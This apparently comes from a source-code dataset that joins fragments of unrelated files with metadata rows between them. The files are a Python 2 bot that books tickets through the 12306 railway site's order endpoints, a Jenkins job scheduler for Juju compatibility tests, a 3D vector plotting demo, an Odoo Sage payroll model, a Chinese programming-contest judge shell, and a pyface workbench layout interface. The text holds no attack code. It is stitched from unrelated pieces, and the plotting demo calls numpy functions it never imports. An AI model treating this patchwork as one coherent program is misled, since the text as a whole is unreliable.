print(u'初始化订单异常')
print(u'准备下单喽')
url = 'https://kyfw.12306.cn/otn/leftTicket/submitOrderRequest'
parameters = [
#('ODA4NzIx', 'MTU0MTczYmQ2N2I3MjJkOA%3D%3D'),
('myversion', 'undefined'),
('secretStr', self.trains[self.current_train_index]['secretStr']),
('train_date', self.train_date),
('back_train_date', self.back_train_date),
('tour_flag', self.tour_flag),
('purpose_codes', self.purpose_code),
('query_from_station_name', self.from_city_name),
('query_to_station_name', self.to_city_name),
('undefined', '')
]
# TODO 注意:此处post不需要做urlencode, 比较奇怪, 不能用urllib.urlencode(parameters)
payload = ''
length = len(parameters)
for i in range(0, length):
payload += parameters[i][0] + '=' + parameters[i][1]
if i < (length - 1):
payload += '&'
r = self.post(url, payload)
if not r:
print(u'下单异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"messages":[],"validateMessages":{}}
obj = r.json()
if not (hasKeys(obj, ['status', 'httpstatus'])
and obj['status']):
print(u'下单失败啦')
dumpObj(obj)
return RET_ERR
print(u'订单初始化...')
self.session.close() # TODO
url = 'https://kyfw.12306.cn/otn/confirmPassenger/initDc'
parameters = [
('_json_att', ''),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'订单初始化异常')
return RET_ERR
data = r.text
s = data.find('globalRepeatSubmitToken') # TODO
e = data.find('global_lang')
if s == -1 or e == -1:
print(u'找不到 globalRepeatSubmitToken')
return RET_ERR
buf = data[s:e]
s = buf.find("'")
e = buf.find("';")
if s == -1 or e == -1:
print(u'很遗憾, 找不到 globalRepeatSubmitToken')
return RET_ERR
self.repeatSubmitToken = buf[s + 1:e]
s = data.find('key_check_isChange')
e = data.find('leftDetails')
if s == -1 or e == -1:
print(u'找不到 key_check_isChange')
return RET_ERR
self.keyCheckIsChange = data[s + len('key_check_isChange') + 3:e - 3]
return RET_OK
def checkOrderInfo(self):
if self.checkRandCodeAnsyn('passenger') == RET_ERR:
return RET_ERR
passengerTicketStr = ''
oldPassengerStr = ''
passenger_seat_detail = '0' # TODO [0->随机][1->下铺][2->中铺][3->上铺]
for p in self.passengers:
if p['index'] != 1:
passengerTicketStr += 'N_'
oldPassengerStr += '1_'
passengerTicketStr += '%s,%s,%s,%s,%s,%s,%s,' % (
p['seattype'],
passenger_seat_detail,
p['tickettype'],
p['name'],
p['cardtype'],
p['id'],
p['phone'])
oldPassengerStr += '%s,%s,%s,' % (
p['name'],
p['cardtype'],
p['id'])
passengerTicketStr += 'N'
oldPassengerStr += '1_'
self.passengerTicketStr = passengerTicketStr
self.oldPassengerStr = oldPassengerStr
print(u'检查订单...')
url = 'https://kyfw.12306.cn/otn/confirmPassenger/checkOrderInfo'
parameters = [
('cancel_flag', '2'), # TODO
('bed_level_order_num', '000000000000000000000000000000'), # TODO
('passengerTicketStr', self.passengerTicketStr),
('oldPassengerStr', self.oldPassengerStr),
('tour_flag', self.tour_flag),
('randCode', self.captcha),
#('NzA4MTc1', 'NmYyYzZkYWY2OWZkNzg2YQ%3D%3D'), # TODO
('_json_att', ''),
('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'检查订单异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"submitStatus":true},"messages":[],"validateMessages":{}}
obj = r.json()
if (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['submitStatus'])
and obj['status']
and obj['data']['submitStatus']):
print(u'检查订单成功')
return RET_OK
else:
print(u'检查订单失败')
dumpObj(obj)
return RET_ERR
def getQueueCount(self):
print(u'查询排队情况...')
url = 'https://kyfw.12306.cn/otn/confirmPassenger/getQueueCount'
t = self.trains[self.current_train_index]['queryLeftNewDTO']
parameters = [
('train_date', date2UTC(self.train_date)),
('train_no', t['train_no']),
('stationTrainCode', t['station_train_code']),
('seatType', '1'), # TODO
('fromStationTelecode', t['from_station_telecode']),
('toStationTelecode', t['to_station_telecode']),
('leftTicket', t['yp_info']),
('purpose_codes', '00'), # TODO
('_json_att', ''),
('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken)
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'查询排队情况异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"count":"0","ticket":"100985109710098535003021350212","op_2":"false","countT":"0","op_1":"false"},"messages":[],"validateMessages":{}}
obj = r.json()
if not (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['op_1', 'op_2'])
and obj['status']):
print(u'查询排队情况失败')
dumpObj(obj)
return RET_ERR
if obj['data']['op_1'] != 'false':
print(u'已有人先于您提交相同的购票需求, 到处理您的需求时可能已无票, 建议根据当前余票确定是否排队.')
if obj['data']['op_2'] != 'false':
print(u'目前排队人数已经超过余票张数,请您选择其他席别或车次,特此提醒。')
if 'ticket' in obj['data']:
print(u'排队详情:%s' % (obj['data']['ticket'])) # TODO
return RET_OK
def confirmSingleForQueue(self):
print(u'提交订单排队...')
url = 'https://kyfw.12306.cn/otn/confirmPassenger/confirmSingleForQueue'
t = self.trains[self.current_train_index]['queryLeftNewDTO']
parameters = [
('passengerTicketStr', self.passengerTicketStr),
('oldPassengerStr', self.oldPassengerStr),
('randCode', self.captcha),
('purpose_codes', '00'), # TODO
('key_check_isChange', self.keyCheckIsChange),
('leftTicketStr', t['yp_info']),
('train_location', t['location_code']),
('_json_att', ''),
('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'提交订单排队异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"submitStatus":true},"messages":[],"validateMessages":{}}
obj = r.json()
if (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['submitStatus'])
and obj['status'] and obj['data']['submitStatus']):
print(u'订单排队中...')
return RET_OK
else:
print(u'提交订单排队失败')
dumpObj(obj)
return RET_ERR
def queryOrderWaitTime(self):
print(u'等待订单流水号...')
url = 'https://kyfw.12306.cn/otn/confirmPassenger/queryOrderWaitTime?random=%13d&tourFlag=dc&_json_att=&REPEAT_SUBMIT_TOKEN=%s' % (
random.randint(1000000000000, 1999999999999), self.repeatSubmitToken)
r = self.get(url)
if not r:
print(u'等待订单流水号异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"queryOrderWaitTimeStatus":true,"count":0,"waitTime":4,"requestId":5944637152210732219,"waitCount":2,"tourFlag":"dc","orderId":null},"messages":[],"validateMessages":{}}
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"queryOrderWaitTimeStatus":true,"count":0,"waitTime":-1,"requestId":5944637152210732219,"waitCount":0,"tourFlag":"dc","orderId":"E739900792"},"messages":[],"validateMessages":{}}
obj = r.json()
if not (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['orderId'])
and obj['status']
and obj['data']['orderId']):
print(u'等待订单流水号失败')
dumpObj(obj)
return RET_ERR
self.orderId = obj['data']['orderId']
if (self.orderId and self.orderId != 'null'):
print(u'订单流水号为:')
print(self.orderId)
return RET_OK
else:
print(u'等待订单流水号失败')
return RET_ERR
def payOrder(self):
print(u'等待订票结果...')
url = 'https://kyfw.12306.cn/otn/confirmPassenger/resultOrderForDcQueue'
parameters = [
('orderSequence_no', self.orderId),
('_json_att', ''),
('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'等待订票结果异常')
return RET_ERR
# {'validateMessagesShowId':'_validatorMessage','status':true,'httpstatus':200,'data':{'submitStatus':true},'messages':[],'validateMessages':{}}
# {'validateMessagesShowId':'_validatorMessage','status':true,'httpstatus':200,'data':{'errMsg':'获取订单信息失败,请查看未完成订单,继续支付!','submitStatus':false},'messages':[],'validateMessages':{}}
obj = r.json()
if not (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['submitStatus'])
and obj['status']
and obj['data']['submitStatus']):
print(u'等待订票结果失败')
dumpObj(obj)
return RET_ERR
url = 'https://kyfw.12306.cn/otn//payOrder/init?random=%13d' % (
random.randint(1000000000000, 1999999999999))
parameters = [
('_json_att', ''),
('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'请求异常')
return RET_ERR
data = r.text
if data.find(u'席位已锁定') != -1:
print(u'订票成功^_^请在45分钟内完成网上支付,否则系统将自动取消')
return RET_OK
else:
return RET_ERR
def queryMyOrderNotComplete(self):
print(u'正在查询未完成订单...')
url = 'https://kyfw.12306.cn/otn/queryOrder/queryMyOrderNoComplete'
parameters = [
('_json_att', ''),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'查询未完成订单异常')
return RET_ERR
obj = r.json()
if not (hasKeys(obj, ['status', 'httpstatus', 'data']) and obj['status']):
print(u'查询未完成订单失败')
dumpObj(obj)
return RET_ERR
if (hasKeys(obj['data'], ['orderDBList']) and len(obj['data']['orderDBList'])):
print(u'查询到有未完成订单,请先处理')
return RET_OK
if (
hasKeys(obj['data'], ['orderCacheDTO'])
and obj['data']['orderCacheDTO']
and hasKeys(obj['data']['orderCacheDTO'], ['status'])):
if obj['data']['orderCacheDTO']['status'] == 0:
print(u'查询到cache有未完成订单,请先处理')
return RET_OK
else:
if (hasKeys(obj['data']['orderCacheDTO'], ['message'])):
dumpObj(obj['data']['orderCacheDTO']['message'])
return RET_ERR
def main():
print(getTime())
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--config', help='Specify config file')
parser.add_argument('-u', '--username', help='Specify username to login')
parser.add_argument('-p', '--password', help='Specify password to login')
parser.add_argument('-d', '--date', help='Specify train date, 2014-01-01')
parser.add_argument('-m', '--mail', help='Send email notification')
args = parser.parse_args()
order = MyOrder()
order.initSession()
order.initStation()
if args.config:
order.readConfig(args.config) # 使用指定的配置文件
else:
order.readConfig() # 使用默认的配置文件config.ini
if args.username:
order.username = args.username # 使用指定的账号代替配置文件中的账号
if args.password:
order.password = args.password # 使用指定的密码代替配置文件中的密码
if args.date:
if checkDate(args.date):
order.train_date = args.date # 使用指定的乘车日期代替配置文件中的乘车日期
else:
print(u'乘车日期无效, 请重新选择')
order.train_date = selectDate()
if args.mail:
# 有票时自动发送邮件通知
order.notify['mail_enable'] = 1 if args.mail == '1' else 0
tries = 0
while tries < MAX_TRIES:
tries += 1
if order.login() == RET_OK:
break
else:
print(u'失败次数太多,自动退出程序')
sys.exit()
order.selectPassengers(1)
while True:
time.sleep(1)
# 查询车票
if order.queryTickets() != RET_OK:
continue
# 显示查询结果
if order.printTrains() != RET_OK:
continue
# 选择菜单列举的动作之一
action = order.selectAction()
if action == -1:
continue
elif action == 0:
break
# 订单初始化
if order.initOrder() != RET_OK:
continue
# 检查订单信息
if order.checkOrderInfo() != RET_OK:
continue
# 查询排队和余票情况
# if order.getQueueCount() != RET_OK:
# continue
# 提交订单到队里中
tries = 0
while tries < 2:
tries += 1
if order.confirmSingleForQueue() == RET_OK:
break
# 获取orderId
tries = 0
while tries < 2:
tries += 1
if order.queryOrderWaitTime() == RET_OK:
break
# 正式提交订单
if order.payOrder() == RET_OK:
break
# 访问未完成订单页面检查是否订票成功
if order.queryMyOrderNotComplete() == RET_OK:
print(u'订票成功^_^请在45分钟内完成网上支付,否则系统将自动取消')
break
print(getTime())
raw_input('Press any key to continue')
if __name__ == '__main__':
main()
# EOF
|
gpl-2.0
| -631,110,503,267,683,200
| 37.075581
| 273
| 0.491627
| false
| 3.173478
| false
| false
| false
|
mjs/juju
|
acceptancetests/schedule_hetero_control.py
|
1
|
3284
|
#!/usr/bin/env python
from __future__ import print_function
from argparse import ArgumentParser
import json
import os
import re
from jenkins import Jenkins
from jujuci import (
add_credential_args,
get_credentials,
)
from utility import (
find_candidates,
get_candidates_path,
)
def get_args(argv=None):
parser = ArgumentParser()
parser.add_argument(
'root_dir', help='Directory containing releases and candidates dir')
parser.add_argument(
'--all', action='store_true', default=False,
help='Schedule all candidates for client-server testing.')
add_credential_args(parser)
args = parser.parse_args(argv)
return args, get_credentials(args)
def get_releases(root):
release_path = os.path.join(root, 'old-juju')
released_pattern = re.compile('^\d+\.\d+\.\d+[^~]*$')
for entry in os.listdir(release_path):
if not os.path.isdir(os.path.join(release_path, entry)):
continue
if released_pattern.match(entry):
yield entry
def get_candidate_info(candidate_path):
""" Return candidate version and revision build number. """
with open(os.path.join(candidate_path, 'buildvars.json')) as fp:
build_vars = json.load(fp)
return build_vars['version'], build_vars['revision_build']
def calculate_jobs(root, schedule_all=False):
releases = list(get_releases(root))
candidates_path = get_candidates_path(root)
for candidate_path in find_candidates(root, schedule_all):
parent, candidate = os.path.split(candidate_path)
if candidate.startswith('1.26'):
# 1.26 was renamed to 2.0 because it is not compatible with 1.x
continue
if parent != candidates_path:
raise ValueError('Wrong path')
candidate_version, revision_build = get_candidate_info(candidate_path)
for release in releases:
# Releases with the same major number must be compatible.
if release[:2] != candidate[:2]:
continue
for client_os in ('ubuntu', 'osx', 'windows'):
yield {
'old_version': release, # Client
'candidate': candidate_version, # Server
'new_to_old': 'true',
'candidate_path': candidate,
'client_os': client_os,
'revision_build': revision_build,
}
yield {
'old_version': release, # Server
'candidate': candidate_version, # Client
'new_to_old': 'false',
'candidate_path': candidate,
'client_os': client_os,
'revision_build': revision_build,
}
def build_jobs(credentials, root, jobs):
jenkins = Jenkins('http://juju-ci.vapour.ws:8080', *credentials)
os_str = {"ubuntu": "", "osx": "-osx", "windows": "-windows"}
for job in jobs:
jenkins.build_job(
'compatibility-control{}'.format(os_str[job['client_os']]), job)
def main():
args, credentials = get_args()
build_jobs(
credentials, args.root_dir, calculate_jobs(args.root_dir, args.all))
if __name__ == '__main__':
main()
|
agpl-3.0
| 8,702,900,788,134,910,000
| 32.510204
| 78
| 0.58648
| false
| 4.03936
| false
| false
| false
|
NicovincX2/Python-3.5
|
Algèbre/Opération/scalar_product.py
|
1
|
1933
|
# -*- coding: utf-8 -*-
import os
import seaborn
seaborn.set()
colors = seaborn.color_palette()
import utils
# For 3D plotting we need to import some extra stuff
from mpl_toolkits.mplot3d import Axes3D
# First create two random vectors in 3 dimensional space
v1 = rand(3, 1)
v2 = rand(3, 1)
# And scale them to unit length
v1 = v1 / norm(v1)
v2 = v2 / norm(v2)
# Plot the vectors
o = zeros(3) # origin
# We'll use the object oriented plotting interface
f = figure(figsize=(8, 8))
ax = f.add_subplot(111, projection="3d", axisbg="white")
ax.plot(*[[o[i], v1[i]] for i in range(3)], linewidth=3, label="vector1")
ax.plot(*[[o[i], v2[i]] for i in range(3)], linewidth=3, label="vector2")
for axisl in ["x", "y", "z"]:
getattr(ax, "set_%slabel" % axisl)(axisl) # Here's a fun trick
legend()
f = figure(figsize=(8, 8))
ax = f.add_subplot(111, projection="3d", axisbg="white")
ax.plot(*[[o[i], v1[i]] for i in range(3)], linewidth=3, label="vector1")
ax.plot(*[[o[i], v2[i]] for i in range(3)], linewidth=3, label="vector2")
for axisl in ["x", "y", "z"]:
getattr(ax, "set_%slabel" % axisl)(axisl) # Here's a fun trick
legend()
for i in range(100):
# generate a point that is a weighted sum of the 2 vectors
w1 = randn(1)
w2 = randn(1)
point = w1 * v1 + w2 * v2
ax.plot(*point, marker=".", color="k")
# We can find a vector that is orthogonal to the plane defined by v1 and v2
# by taking the vector cross product. See the wikipedia page for a
# definition of cross product
# Must be right shape for cross()
v3 = cross(v1.reshape(1, 3), v2.reshape(1, 3)).squeeze()
ax.plot(*[[o[i], v3[i]] for i in range(3)],
linewidth=3, label="orthogonal vector")
legend()
print(v3[0] * v1[0] + v3[1] * v1[1] + v3[2] * v1[2])
print(dot(v3, v1))
theta = arccos(dot(v2.T, v1)).squeeze()
# and radians can be converted to degrees
theta_deg = theta * (180 / pi)
print(theta, theta_deg)
os.system("pause")
|
gpl-3.0
| -667,495,029,262,324,100
| 28.287879
| 75
| 0.644594
| false
| 2.647945
| false
| false
| false
|
nuobit/odoo-addons
|
connector_sage/models/payroll_sage_payslip_line_payroll/binding.py
|
1
|
1439
|
# Copyright NuoBiT Solutions, S.L. (<https://www.nuobit.com>)
# Eric Antones <eantones@nuobit.com>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl)
from odoo import models, fields
from odoo.addons.queue_job.job import job
class PayslipLinePayrollBinding(models.Model):
_name = 'sage.payroll.sage.payslip.line.payroll'
_inherit = 'sage.payroll.sage.payslip.line'
_sql_constraints = [
('uniq',
'unique(sage_codigo_empresa, sage_codigo_convenio, sage_fecha_registro_cv, '
'sage_ano, sage_mesd, sage_tipo_proceso, '
'sage_codigo_empleado, sage_codigo_concepto_nom)',
'Payroll Payslip with same ID on Sage already exists.'),
]
@job(default_channel='root.sage')
def import_payslip_lines(self, payslip_id, backend_record):
""" Prepare the import of payslip from Sage """
filters = {
'CodigoEmpresa': backend_record.sage_company_id,
'CodigoConvenio': payslip_id.labour_agreement_id.code,
'FechaRegistroCV': fields.Date.from_string(payslip_id.labour_agreement_id.registration_date_cv),
'Año': payslip_id.year,
'MesD': ('between', (payslip_id.month_from, payslip_id.month_to)),
'TipoProceso': payslip_id.process,
}
self.env['sage.payroll.sage.payslip.line.payroll'].import_batch(
backend=backend_record, filters=filters)
return True
|
agpl-3.0
| 8,891,023,557,051,853,000
| 36.842105
| 108
| 0.649513
| false
| 3.139738
| false
| false
| false
|
cuihaoleo/PyTest
|
PyTest.py
|
1
|
7675
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
##
# PyTest.py
# This file is part of PyTest.
#
# PyTest
# Python编写的OI评测器后端
# Copyright (C) 2011 CUI Hao
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Author: 崔灏 (CUI Hao)
# Email: cuihao.leo@gmail.com
##
import cmd
import os
import shlex
import pickle
from PlayerClass import PyTest_Player
from ProblemClass import PyTest_Problem
from ProblemConfig import Cfg2Prob
class PyTest_Cmd (cmd.Cmd):
def __init__ (self):
cmd.Cmd.__init__(self)
self.prompt = "(PyTest) "
self.Name = "Unnamed"
self.Players = {}
self.Problems = {}
self.do_EOF = self.do_quit
def AddProb (self, cfg):
try:
prob = Cfg2Prob(cfg)
except Exception as exp:
print("无法添加题目 %s : 导入时发生错误")
print(exp)
else:
if prob.Name in self.Problems.keys():
print("无法添加题目 %s : 相同名称的题目已存在" % prob.Name)
else:
self.Problems[prob.Name] = prob
print("添加题目 %s" % prob.Name)
def AddPlayer (self, path):
try:
player = PyTest_Player(path)
except Exception as exp:
print("无法添加选手 %s : 导入时发生错误")
print(exp)
else:
if player.Name in self.Players.keys():
print("无法添加选手 %s : 相同名称的对象已存在" % player.Name)
else:
self.Players[player.Name] = player
print("添加选手 %s" % player.Name)
def DelProb (self, name):
try:
del self.Problems[name]
except KeyError:
print("无法删除题目 %s : 题目不存在" % name)
else:
print("删除题目 %s" % name)
def DelPlayer (self, name):
try:
del self.Players[name]
except KeyError:
print("无法删除选手 %s : 对象不存在" % name)
else:
print("删除选手 %s" % name)
def Testit (self, pl, pr):
try:
player = self.Players[pl]
except KeyError:
print("未知用户 %s" % pl)
return
try:
prob = self.Problems[pr]
except KeyError:
print("未知用户 %s" % pr)
return
player.Do(prob)
def help_quit (self):
print("quit")
print("退出")
def do_quit (self, line):
exit()
def help_name (self):
print("name [@名称]")
print("设置评测名称。若没有提供,显示当前名称")
def do_name (self, name):
if len(name.strip()) == 0:
print(self.Judge.Name)
else:
self.Judge.Name = name
def help_addprob (self):
print("addprob @配置文件1 [@配置文件2 [...]]")
print("添加题目")
def do_addprob (self, line):
for path in shlex.split(line):
self.AddProb(path)
def help_delprob (self):
print("delprob @题目1 [@题目2 [...]]")
print("删除题目")
def do_delprob (self, line):
for name in shlex.split(line):
self.DelProb(name)
def help_prob (self):
print("prob")
print("显示所有题目")
def do_prob (self, line):
for p in self.Problems:
print("%s: %s" % (p, self.Problems[p].CfgFile))
def help_add (self):
print("add @目录1 [@目录2 [...]]")
print("添加选手")
def do_add (self, line):
for path in shlex.split(line):
self.AddPlayer(path)
def help_addall (self):
print("addall @目录1 [@目录2 [...]]")
print("添加目录中的所有文件夹作为选手")
def do_addall (self, line):
for path in shlex.split(line):
try:
paths = next(os.walk(path))[1]
except StopIteration:
continue
for f in paths:
self.AddPlayer(os.path.join(path, f))
def help_del (self):
print("del @选手1 [@选手2 [...]]")
print("删除选手")
def do_del (self, line):
for name in shlex.split(line):
self.DelPlayer(name)
def help_player (self):
print("player")
print("显示所有选手")
def do_player (self, line):
for p in self.Players:
print("%s: %s" % (p, self.Players[p].Path))
def help_rec (self):
print("rec @选手 @题目")
print("显示详细评测信息")
def do_rec (self, line):
arg = shlex.split(line)
if len(arg)==2:
pl, pr = arg
else:
return
try:
li = self.Players[pl].Record[pr]
except KeyError:
print("记录不存在")
return
for idx in li:
print()
print("[测试#%s]" % idx)
for dic in li[idx]:
print("<文件 %s>" % dic.get("file", ""))
print("信息: %s" % dic.get("msg", ""))
print("得分: %s" % dic.get("score", ""))
def help_print (self):
print("打印Python表达式")
def do_print (self, line):
try:
print(eval(line))
except Exception as err:
print(err)
def help_test (self):
print("启动测试")
def do_test (self, line):
arg = shlex.split(line)
if len(arg) == 2:
Testit(*arg)
elif len(arg) == 0:
pls = input("测试对象(默认全部):").split()
prs = input("题目(默认全部):").split()
if len(pls) == 0:
pls = self.Players.keys()
if len(prs) == 0:
prs = self.Problems.keys()
for player in pls:
for prob in prs:
self.Testit(player, prob)
print()
def help_save (self):
print("储存本次测试")
def do_save (self, line):
path = shlex.split(line)[0]
if os.path.lexists(path):
while True:
ch = input("文件已存在,是否覆盖(Y/N)?")
if ch in ("y", "Y"):
break
elif ch in ("n", "N"):
return
f = open(path, "wb")
pickle.dump(self.Name, f, pickle.HIGHEST_PROTOCOL)
pickle.dump(self.Players, f, pickle.HIGHEST_PROTOCOL)
pickle.dump(self.Problems, f, pickle.HIGHEST_PROTOCOL)
f.close()
def help_load (self):
print("加载测试")
def do_load (self, line):
path = shlex.split(line)[0]
try:
f = open(path, "rb")
except IOError as err:
print(err)
return
self.Name = pickle.load(f)
self.Players = pickle.load(f)
self.Problems = pickle.load(f)
if __name__ == '__main__':
pytest = PyTest_Cmd()
pytest.cmdloop()
|
gpl-3.0
| 1,755,466,251,019,039,200
| 26
| 71
| 0.508379
| false
| 3.098168
| true
| false
| false
|
geggo/pyface
|
pyface/workbench/i_workbench_window_layout.py
|
3
|
10821
|
#------------------------------------------------------------------------------
# Copyright (c) 2005, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in enthought/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Enthought, Inc.
# Description: <Enthought pyface package component>
#------------------------------------------------------------------------------
""" The workbench window layout interface. """
# Enthought library imports.
from traits.api import Event, HasTraits, Instance, Interface, Str
from traits.api import provides
# Local imports.
from .i_editor import IEditor
from .i_view import IView
class IWorkbenchWindowLayout(Interface):
""" The workbench window layout interface.
Window layouts are responsible for creating and managing the internal
structure of a workbench window (it knows how to add and remove views and
editors etc).
"""
# The Id of the editor area.
# FIXME v3: This is toolkit specific.
editor_area_id = Str
# The workbench window that this is the layout for.
window = Instance('pyface.workbench.api.WorkbenchWindow')
#### Events ####
# Fired when an editor is about to be opened (or restored).
editor_opening = Event(IEditor)
# Fired when an editor has been opened (or restored).
editor_opened = Event(IEditor)
# Fired when an editor is about to be closed.
editor_closing = Event(IEditor)
# Fired when an editor has been closed.
editor_closed = Event(IEditor)
# Fired when a view is about to be opened (or restored).
view_opening = Event(IView)
# Fired when a view has been opened (or restored).
view_opened = Event(IView)
# Fired when a view is about to be closed (*not* hidden!).
view_closing = Event(IView)
# Fired when a view has been closed (*not* hidden!).
view_closed = Event(IView)
# FIXME v3: The "just for convenience" returns are a really bad idea.
#
# Why? They allow the call to be used on the LHS of an expression...
# Because they have nothing to do with what the call is supposed to be
# doing, they are unlikely to be used (because they are so unexpected and
# inconsistently implemented), and only serve to replace two shorter lines
# of code with one long one, arguably making code more difficult to read.
def activate_editor(self, editor):
""" Activate an editor.
Returns the editor (just for convenience).
"""
def activate_view(self, view):
""" Activate a view.
Returns the view (just for convenience).
"""
def add_editor(self, editor, title):
""" Add an editor.
Returns the editor (just for convenience).
"""
def add_view(self, view, position=None, relative_to=None, size=(-1, -1)):
""" Add a view.
Returns the view (just for convenience).
"""
def close_editor(self, editor):
""" Close an editor.
Returns the editor (just for convenience).
"""
def close_view(self, view):
""" Close a view.
FIXME v3: Currently views are never 'closed' in the same sense as an
editor is closed. When we close an editor, we destroy its control.
When we close a view, we merely hide its control. I'm not sure if this
is a good idea or not. It came about after discussion with Dave P. and
he mentioned that some views might find it hard to persist enough state
that they can be re-created exactly as they were when they are shown
again.
Returns the view (just for convenience).
"""
def close(self):
""" Close the entire window layout.
FIXME v3: Should this be called 'destroy'?
"""
def create_initial_layout(self, parent):
""" Create the initial window layout.
Returns the layout.
"""
def contains_view(self, view):
""" Return True if the view exists in the window layout.
Note that this returns True even if the view is hidden.
"""
def hide_editor_area(self):
""" Hide the editor area.
"""
def hide_view(self, view):
""" Hide a view.
Returns the view (just for convenience).
"""
def refresh(self):
""" Refresh the window layout to reflect any changes.
"""
def reset_editors(self):
""" Activate the first editor in every group.
"""
def reset_views(self):
""" Activate the first view in every region.
"""
def show_editor_area(self):
""" Show the editor area.
"""
def show_view(self, view):
""" Show a view.
"""
#### Methods for saving and restoring the layout ##########################
def get_view_memento(self):
""" Returns the state of the views.
"""
def set_view_memento(self, memento):
""" Restores the state of the views.
"""
def get_editor_memento(self):
""" Returns the state of the editors.
"""
def set_editor_memento(self, memento):
""" Restores the state of the editors.
"""
def get_toolkit_memento(self):
""" Return any toolkit-specific data that should be part of the memento.
"""
def set_toolkit_memento(self, memento):
""" Restores any toolkit-specific data.
"""
@provides(IWorkbenchWindowLayout)
class MWorkbenchWindowLayout(HasTraits):
""" Mixin containing common code for toolkit-specific implementations. """
#### 'IWorkbenchWindowLayout' interface ###################################
# The Id of the editor area.
# FIXME v3: This is toolkit specific.
editor_area_id = Str
# The workbench window that this is the layout for.
window = Instance('pyface.workbench.api.WorkbenchWindow')
#### Events ####
# Fired when an editor is about to be opened (or restored).
editor_opening = Event(IEditor)
# Fired when an editor has been opened (or restored).
editor_opened = Event(IEditor)
# Fired when an editor is about to be closed.
editor_closing = Event(IEditor)
# Fired when an editor has been closed.
editor_closed = Event(IEditor)
# Fired when a view is about to be opened (or restored).
view_opening = Event(IView)
# Fired when a view has been opened (or restored).
view_opened = Event(IView)
# Fired when a view is about to be closed (*not* hidden!).
view_closing = Event(IView)
# Fired when a view has been closed (*not* hidden!).
view_closed = Event(IView)
###########################################################################
# 'IWorkbenchWindowLayout' interface.
###########################################################################
def activate_editor(self, editor):
""" Activate an editor. """
raise NotImplementedError
def activate_view(self, view):
""" Activate a view. """
raise NotImplementedError
def add_editor(self, editor, title):
""" Add an editor. """
raise NotImplementedError
def add_view(self, view, position=None, relative_to=None, size=(-1, -1)):
""" Add a view. """
raise NotImplementedError
def close_editor(self, editor):
""" Close an editor. """
raise NotImplementedError
def close_view(self, view):
""" Close a view. """
raise NotImplementedError
def close(self):
""" Close the entire window layout. """
raise NotImplementedError
def create_initial_layout(self, parent):
""" Create the initial window layout. """
raise NotImplementedError
def contains_view(self, view):
""" Return True if the view exists in the window layout. """
raise NotImplementedError
def hide_editor_area(self):
""" Hide the editor area. """
raise NotImplementedError
def hide_view(self, view):
""" Hide a view. """
raise NotImplementedError
def refresh(self):
""" Refresh the window layout to reflect any changes. """
raise NotImplementedError
def reset_editors(self):
""" Activate the first editor in every group. """
raise NotImplementedError
def reset_views(self):
""" Activate the first view in every region. """
raise NotImplementedError
def show_editor_area(self):
""" Show the editor area. """
raise NotImplementedError
def show_view(self, view):
""" Show a view. """
raise NotImplementedError
#### Methods for saving and restoring the layout ##########################
def get_view_memento(self):
""" Returns the state of the views. """
raise NotImplementedError
def set_view_memento(self, memento):
""" Restores the state of the views. """
raise NotImplementedError
def get_editor_memento(self):
""" Returns the state of the editors. """
raise NotImplementedError
def set_editor_memento(self, memento):
""" Restores the state of the editors. """
raise NotImplementedError
def get_toolkit_memento(self):
""" Return any toolkit-specific data that should be part of the memento.
"""
return None
def set_toolkit_memento(self, memento):
""" Restores any toolkit-specific data.
"""
return
###########################################################################
# Protected 'MWorkbenchWindowLayout' interface.
###########################################################################
def _get_editor_references(self):
""" Returns a reference to every editor. """
editor_manager = self.window.editor_manager
editor_references = {}
for editor in self.window.editors:
# Create the editor reference.
#
# If the editor manager returns 'None' instead of a resource
# reference then this editor will not appear the next time the
# workbench starts up. This is useful for things like text files
# that have an editor but have NEVER been saved.
editor_reference = editor_manager.get_editor_memento(editor)
if editor_reference is not None:
editor_references[editor.id] = editor_reference
return editor_references
#### EOF ######################################################################
|
bsd-3-clause
| -4,267,509,263,042,674,000
| 26.675192
| 80
